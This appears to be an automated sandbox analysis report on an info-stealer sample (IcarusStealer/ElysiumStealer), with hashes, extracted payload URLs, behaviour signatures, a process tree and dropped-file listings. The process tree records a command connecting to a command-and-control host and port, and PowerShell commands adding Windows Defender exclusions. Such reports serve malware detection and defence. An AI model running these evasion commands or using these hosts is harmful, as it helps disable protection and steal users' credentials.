Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    28-02-2024 04:29

General

  • Target

    Icarus/ICARUS.exe

  • Size

    9.0MB

  • MD5

    9cc1ab88f9d504b9b7ba86060536591f

  • SHA1

    8ca6f1b2d9b495dbdee0d7439b1e8febbfd708a9

  • SHA256

    5eec574e6fb9257cc3d7cceb3d1feae2b96355ccbd0c5b5357458a905e7aea75

  • SHA512

    2a26448d267b4b5611658fee597076c899a5845d00581c27d7742b0a110d5bbdc2bfd4d62702cc1a1b12cbca631e8b5b34107320061282fc239e760a00525a89

  • SSDEEP

    196608:yeUedsYnK7Q7CE2Zi45lO4nftv0cuaPdvrqt8l1ra8WcnqhbWf1FD6xz:gedlK7emHtnuarlpnqhbWfD6F

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • ElysiumStealer Support DLL 1 IoCs
  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Icarus\ICARUS.exe
    "C:\Users\Admin\AppData\Local\Temp\Icarus\ICARUS.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\ICARUS.exe
      "C:\Users\Admin\AppData\Local\Temp\ICARUS.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2800
    • C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe
      "C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmslqwsp\vmslqwsp.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1738.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC3BC1EA09C754B27982D5DF3E8475F.TMP"
          4⤵
            PID:2560
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2200
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2796
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2332
        • C:\Windows\explorer.exe
          "C:\Windows\explorer.exe"
          3⤵
          • Modifies Installed Components in the registry
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Windows\system32\ctfmon.exe
            ctfmon.exe
            4⤵
              PID:2204
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2440
            • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
              C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\ICARUS.exe

        Filesize

        5.5MB

        MD5

        ca2b3d7762e4ad90db7545708d03a8b5

        SHA1

        a26193745c527d8f1ec42caee22c98574dd88e57

        SHA256

        533863b1493aadb20e6a9f6d729c040db18465268f3ecfea2eaebe5f173a3eee

        SHA512

        44f268c7ae8ff60aac1df49d69454f2901241257a00b46e62dae14f4b02c89d966fe21b38a65a31f1c8bc6676970fcf2e0a58e05c61db72cb12871de9730fe46

      • C:\Users\Admin\AppData\Local\Temp\ICARUS.exe

        Filesize

        5.8MB

        MD5

        cecda9f5581eef571da99f9fb09d2937

        SHA1

        a800323be8392fa9f9d003f953617800270d12c6

        SHA256

        78a45af66552f6cb81e82bf3b240618975fdaa87ae5a1f328fe213cc23cfa004

        SHA512

        0e9d0a8290d0c97314bd25d21ba1ffd03bd327bcb75ce07b4ec85a3d639644291c3f00bfc6e43299f5dd993536de03e7d77ae86762291bc6535ac6e7f8a251c0

      • C:\Users\Admin\AppData\Local\Temp\RES1738.tmp

        Filesize

        1KB

        MD5

        ad90470ae444da44edbefc2ad467a078

        SHA1

        3f51a4ae2fd9e18511ae95cf8aa427d85d8ab05a

        SHA256

        758b1550635e9b7ab9dcf61fa3c87b931b09fb0d17fa5c616d38b987744a64aa

        SHA512

        07315295ab11874f432bf62f9f4833b3059d7dfa765120d78faf379c935333cb90f9d6d11e64241ceae6bc66ef0fb4fdc9d2a88c8f4f85e5faa523b5123d08d8

      • C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe

        Filesize

        494KB

        MD5

        5b501f6a25d9720666a3fbac70be4553

        SHA1

        ccc9472434521c525fb1b9177cb57a9e239784a5

        SHA256

        bc7b8867a7a25e284b7cdab744e0c3d07ee2a9dac3694ed89bb859d30d9b4220

        SHA512

        bc7ad1625aba2cd1842e6d768833602803af70f435cf73630e34a2e8bc430722552874cc575ed34bd7cc2b718eb256814ed6e10297e2d99bd8e1d7d01265af45

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XFYN4TKMMAC1YKG6BZLX.temp

        Filesize

        7KB

        MD5

        00065b03c07c30c5997edb9b5c14e3da

        SHA1

        f2a5a575845e6b2859371f9fa596ddcf0dc07a28

        SHA256

        c9d6094d701bd2433e0a147232718c57c0482b0af0ce0ed80ac622536a9c4ce6

        SHA512

        68d0d4b91136a2697ccb94aeced39abe1d5efc169fb2157c9b3b96b1e31dfab39bf7a0aad4f5666fb128fb40a56a8afec9b05053f25c9c698e613e59becb667a

      • C:\Users\Admin\AppData\Roaming\temp0923

        Filesize

        10B

        MD5

        1d8e61ef478fcd97c6371f930103b99d

        SHA1

        85a8841c0ce8f78943df8cb7af318c6e4b4c94bf

        SHA256

        7cc9a70e8e6bf97d6bf1235a57a9d99dd24571f1f12af4010abe76901e408feb

        SHA512

        e8998ce97f8f8f2f1ed8564c2769c07886e43d1d80339d40b8b536a52b6d993de60ea466fee4d764af5beddd59f10f9b9ec79d3f530fe6f4d537e1fed5a1c4da

      • \??\c:\Users\Admin\AppData\Local\Temp\CSCC3BC1EA09C754B27982D5DF3E8475F.TMP

        Filesize

        1KB

        MD5

        1d5543c367c49b9dd6366270fdd4ee3a

        SHA1

        bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

        SHA256

        502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

        SHA512

        86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

      • \??\c:\Users\Admin\AppData\Local\Temp\vmslqwsp\vmslqwsp.0.cs

        Filesize

        1KB

        MD5

        14846c9faaef9299a1bf17730f20e4e6

        SHA1

        8083da995cfaa0e8e469780e32fcff1747850eb6

        SHA256

        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

        SHA512

        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

      • \??\c:\Users\Admin\AppData\Local\Temp\vmslqwsp\vmslqwsp.cmdline

        Filesize

        451B

        MD5

        65dbae7ea837694bcb49498ecd50b14e

        SHA1

        5b3fc60b73a0c4912a8151fb07a666b9db5d6be0

        SHA256

        37c10a36fb0348a6487547c8da1a2e5a08ed9021cad845b3b449ce5f4d7dec00

        SHA512

        b83f0b53618162fec9a9766ffd030d7d5770dbe543561985a084de922d58ec642d4bd743684c12b65ba23dabc287389b7653c161da165d85963d91e0004ad954

      • \Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll

        Filesize

        40KB

        MD5

        94173de2e35aa8d621fc1c4f54b2a082

        SHA1

        fbb2266ee47f88462560f0370edb329554cd5869

        SHA256

        7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f

        SHA512

        cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798

      • \Users\Admin\AppData\Local\Temp\YourPhone.exe

        Filesize

        4KB

        MD5

        46e7005c65f95ceac1f7e86fe0b052ad

        SHA1

        b4077d906d2bb1e9747314993d53bb03e6359618

        SHA256

        1e2cc3c4c2c77d3ea43f4fab5bc451a8da1c9e4c86cc060796131a911dc25727

        SHA512

        468ff4f3197d6a813c065e4e758f714736fdb8a97edbba4435a809e9225176c9ff1e426368a8d4dbd08bc673ca217bc7011c8fd7c29701433f25447f1de5236a

      • memory/1288-2-0x00000000009F0000-0x0000000000A70000-memory.dmp

        Filesize

        512KB

      • memory/1288-15-0x000007FEF5280000-0x000007FEF5C6C000-memory.dmp

        Filesize

        9.9MB

      • memory/1288-1-0x000007FEF5280000-0x000007FEF5C6C000-memory.dmp

        Filesize

        9.9MB

      • memory/1288-0-0x0000000000C20000-0x000000000151C000-memory.dmp

        Filesize

        9.0MB

      • memory/2200-82-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2200-73-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2200-76-0x0000000002920000-0x0000000002960000-memory.dmp

        Filesize

        256KB

      • memory/2200-75-0x0000000002920000-0x0000000002960000-memory.dmp

        Filesize

        256KB

      • memory/2200-70-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2332-81-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2332-77-0x00000000020D0000-0x0000000002110000-memory.dmp

        Filesize

        256KB

      • memory/2332-74-0x00000000020D0000-0x0000000002110000-memory.dmp

        Filesize

        256KB

      • memory/2332-72-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2332-71-0x00000000020D0000-0x0000000002110000-memory.dmp

        Filesize

        256KB

      • memory/2332-69-0x000000006EC50000-0x000000006F1FB000-memory.dmp

        Filesize

        5.7MB

      • memory/2592-19-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2592-22-0x0000000004670000-0x00000000046B0000-memory.dmp

        Filesize

        256KB

      • memory/2592-16-0x0000000001140000-0x00000000011C2000-memory.dmp

        Filesize

        520KB

      • memory/2592-68-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2620-91-0x0000000004190000-0x0000000004191000-memory.dmp

        Filesize

        4KB

      • memory/2620-107-0x00000000029C0000-0x00000000029D0000-memory.dmp

        Filesize

        64KB

      • memory/2620-98-0x0000000004190000-0x0000000004191000-memory.dmp

        Filesize

        4KB

      • memory/2628-53-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-60-0x00000000046F0000-0x0000000004730000-memory.dmp

        Filesize

        256KB

      • memory/2628-94-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2628-59-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2628-44-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

        Filesize

        4KB

      • memory/2628-42-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-40-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-36-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-38-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-45-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2628-47-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/2800-85-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2800-92-0x0000000075340000-0x0000000075450000-memory.dmp

        Filesize

        1.1MB

      • memory/2800-20-0x0000000000750000-0x000000000075C000-memory.dmp

        Filesize

        48KB

      • memory/2800-83-0x0000000006430000-0x000000000681A000-memory.dmp

        Filesize

        3.9MB

      • memory/2800-84-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2800-23-0x0000000075340000-0x0000000075450000-memory.dmp

        Filesize

        1.1MB

      • memory/2800-89-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2800-90-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2800-17-0x00000000739F0000-0x00000000740DE000-memory.dmp

        Filesize

        6.9MB

      • memory/2800-18-0x0000000000D10000-0x000000000158E000-memory.dmp

        Filesize

        8.5MB

      • memory/2800-21-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2800-97-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2800-96-0x0000000005100000-0x0000000005140000-memory.dmp

        Filesize

        256KB

      • memory/2892-95-0x000000001AE70000-0x000000001AEF0000-memory.dmp

        Filesize

        512KB

      • memory/2892-56-0x000007FEF4890000-0x000007FEF527C000-memory.dmp

        Filesize

        9.9MB

      • memory/2892-55-0x0000000000030000-0x0000000000038000-memory.dmp

        Filesize

        32KB

      • memory/2892-93-0x000007FEF4890000-0x000007FEF527C000-memory.dmp

        Filesize

        9.9MB

      • memory/2892-78-0x000000001AE70000-0x000000001AEF0000-memory.dmp

        Filesize

        512KB